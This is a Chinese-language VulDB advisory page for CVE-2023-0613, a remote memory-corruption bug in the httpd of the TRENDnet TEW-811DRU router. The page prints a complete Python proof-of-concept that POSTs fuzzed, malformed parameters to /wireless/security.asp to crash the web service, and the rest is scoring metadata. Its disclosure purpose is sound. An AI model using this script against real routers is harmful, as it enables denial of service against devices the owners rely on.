CVSS 元温度得分 | 当前攻击价格 (≈) | CTI兴趣分数 |
---|---|---|
7.3 | $0-$5k | 0.04 |
在TRENDnet TEW-811DRU 1.0.10.0 中已发现分类为致命的漏洞。 受此漏洞影响的是未知功能文件:/wireless/security.asp的组件httpd。 手动调试的不合法输入可导致 内存损坏。 漏洞的CWE定义是 CWE-119。 此漏洞的脆弱性 2023-02-01所披露。
该漏洞被称作为CVE-2023-0613, 攻击可能远程发起, 有技术细节可用。 该漏洞的知名度低于平均水平, 此外还有一个漏洞可利用。 该漏洞利用已公开,可能会被利用。 当前漏洞利用价值为美元大约是 $0-$5k。
它被宣布为proof-of-concept。 可以在vuldb.com下载该漏洞利用。 我们估计的零日攻击价值约为$0-$5k。 该漏洞利用所用的代码是:
import requests,socket import re import time from urllib.parse import urlencodedevice_web_ip = '192.168.10.1'
request = {'HEAD': {'Host': b'Z', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': b',\x80gpsiation//xm', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'enc\xbc\xbc\xbc', 'Content-Length': '1209', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/security.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': b'\x1d2' }, 'PARAM': {b'ecOe': b'/wireless/srcuri\x81\x80.asp', b'\x86od}': 'Qy4zq80U9FFhnKc0BBTA', 'wl_wps_mode': b'd\x10saDte\x80', b'\x96\x96': b' 5', 'wl_bssid': b'SS', 'security_mode': b'OO:E', b'\x88l\x88l_eu_aZ': 0, 'wl_auth_mode': 'none', b'cc@@zw(': 'enabled', 'wl_akm': b'', 'wl_akm_wpa': b'b\x85nd', 'wl_akm_psk': 'disabled', 'wl_akm_wpa2': b'disniled', 'wl_akm_psk2': b'\xd3isabled', 'wl_wai_cert_index': '', 'wl_wai_cert_status': '', b'\x00\xffak\xffakvv_w': 'disabled', b'wkm_wl_akm_wapi\x05\xff\xff': 'disabled', 'wl_key': 2, b'\x01': 'abcde', b'wl{k@{': 'abcdefabcdefe', b'Sk': b'\x01\x8b\x00', b'7l_+ey': b'a\x80\x00\x00\x01\x8f', 'wl_macmode': b'a\x1c(\x1a\xc2\xba\x04\x00al', 'wl_maclist': 48, b'\x7fmmAc3t0t0': '00:0c:29:d9:40:fe', b'wl_mac\xc3\x8f?\xc3\x86\x045\x00\x80\x1b\xc3\x88\xc3\x96\xc3\xa4S\xc2\x96\xc2\x96$\x00Dh\xc3\xb4\xc3\x9flis\xc3\x8b\x0bX>\t\xc2\xaaQ\x03': '00:0c:29:d9:40:ff', b'glFqacKist2': b'2:0c\x8029::@BJ40!fd', b'lmaylistaclma': '', 'wl_maclist4': '', 'wl_maclist5': b'', b'wleAaclb\x7fg': b'', 'wl_maclist7': b'', b'l_++++wlP++++++*+': '', 'wl_maclist10': b'', 'wl_maclist11': b'', b'w\xff\xff\xee\xff\x86ist\x80\x002': b'', b'wl_wlcl\x05\xff\xff\x053': '', b'hl@\x81B_\x7f\xff\x00\xff14': b'', b'w@_maclis': '', 'wl_maclist16': b'', b'wU_maczist17': b'', 'wl_maclist18': b'', 'wl_maclist19': b'', b'w\xc2\x98\x0b$jl\x87mlymc\x9ai': b'', b'w|\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1\xa1': b'', b'a\x00\x00\x02\x00': '', 'wl_maclist23': '', 'wl_maclist24': b'', b'\xa9\x14\twl_maclis\xa9\x14\twl_maclist2': '', 'wl_maclist26': b'', 'wl_maclist27': '', 'wl_maclist28': '', b'wl_l_m\xba\xba\xba\xba\xba\xba': b'', b'l\xff\xff\xfd\xff\xff': b'', 'wl_maclist31': b'', b'J': b'', b'wl_macli\xfft\x00\x02': b'', 'wl_maclist34': b'', 'wl_maclist35': '', b'\x8dlTmaclist36': '', 'wl_maclist37': '', 'wl_maclist38': '', 'wl_maclist39': '', 'wl_maclist40': '', b'sl_maclicl': '', b'\x90l': b'', b'wW_maclist4\xb3': '', 'wl_maclist44': b'', 'wl_maclist45': '', 'wl_maclist46': b'', 'wl_maclist47': b'', b'\x00\x08\x7f': 'Apply', 'wan_apply': '<!--#tr id=', 'mg.alert.7': '', 'wl_key4': b'Q', b'alg.alg.05': b'', 'wl_maclist15': b'', 'expandable': b'', b'\xff\xff\xff\xff45': 4 }, 'ATTR': {'URL': 'http://{}/wireless/security.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }
headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']
try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) print('Finish attack, to check web state.') except Exception as e: print('error:{}'.format(e))
该漏洞被披露后,此前未曾发表过可能的缓解措施。
产品
供应商
名称
版本
许可证
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB 向量: 🔍
VulDB 可靠性: 🔍
CVSSv3
VulDB 元基础分数: 7.5VulDB 元温度得分: 7.3
VulDB 基本分数: 7.5
VulDB 温度得分: 6.8
VulDB 向量: 🔍
VulDB 可靠性: 🔍
NVD 基本分数: 7.5
NVD 向量: 🔍
CNA 基本分数: 7.5
CNA 向量 (VulDB): 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
向量 | 复杂度 | 身份验证 | 保密 | 正直 | 可用性 |
---|---|---|---|---|---|
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
VulDB 基本分数: 🔍
VulDB 温度得分: 🔍
VulDB 可靠性: 🔍
NVD 基本分数: 🔍
攻击
分类: 内存损坏CWE: CWE-119
ATT&CK: 未知
本地: 否
远程: 是
可用性: 🔍
访问: 公共
地位: Proof-of-Concept
编程语言: 🔍
下载: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
价格预测: 🔍
当前价格估算: 🔍
0-Day | 开锁 | 开锁 | 开锁 | 开锁 |
---|---|---|---|---|
今天 | 开锁 | 开锁 | 开锁 | 开锁 |
威胁情报
利益: 🔍活跃演员: 🔍
活跃的 APT 团体: 🔍
对策
建议: 无已知缓解措施地位: 🔍
0天时间: 🔍
时间轴
2023-02-01 🔍2023-02-01 🔍
2023-02-01 🔍
2023-03-01 🔍
来源
地位: 未定义CVE: CVE-2023-0613 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
条目
已创建: 2023-02-01 14時44分已更新: 2023-03-01 11時37分
更改: 2023-02-01 14時44分 (40), 2023-02-01 14時45分 (2), 2023-02-01 17時52分 (1), 2023-03-01 11時30分 (2), 2023-03-01 11時37分 (27)
完整: 🔍
提交者: leetsun
Submit
已接受
- Submit #76278: Web crash on TRENDnet router TEW-811DRU (由 leetsun)
暂时没有任何评论。 语言: zh + en.
请登录后发表评论。